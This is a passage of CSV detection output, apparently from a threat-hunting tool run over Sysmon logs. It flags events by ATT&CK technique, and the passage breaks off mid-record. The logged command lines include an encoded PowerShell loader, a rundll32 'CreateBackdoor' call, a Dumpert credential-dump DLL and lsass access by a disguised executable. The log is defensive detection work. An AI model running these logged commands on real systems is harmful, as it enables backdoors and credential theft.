SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5880 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.070 + 365ABB72-3D6D-5CEB-0000-0010575CFF00 + 2644 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 23 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:14.781 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17286 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.482 + 365ABB72-B167-5CD9-0000-0010EE150C00 + 2372 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + /c notepad.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-0020DE330100 + 0x133de + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 23 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:14.781 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 9060 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 12:43:43.784 + 365ABB72-4055-5CC8-0000-0010769D0B00 + 1532 + \\VBOXSVR\HTools\voice_mail.msg.exe + 365ABB72-3FE0-5CC8-0000-00107E590000 + 492 + C:\Windows\System32\lsass.exe + 1744 + 0x001A0000 + + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4923 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:34.234 + 747F3D96-662E-5D3F-0000-0010C2048900 + 1976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net start CDPSvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 12:35:55.872 + 747F3D96-0A2B-5E76-0000-0010C02A3D00 + 7072 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net.exe + net start CDPSvc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-06A4-5E76-0000-002043DE0200 + 0x2de43 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-077C-5E76-0000-0010A5BA2300 + 5068 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5877 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:16.960 + 365ABB72-3D6C-5CEB-0000-00107257FF00 + 3484 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + Microsoft-Windows-Sysmon/Operational + 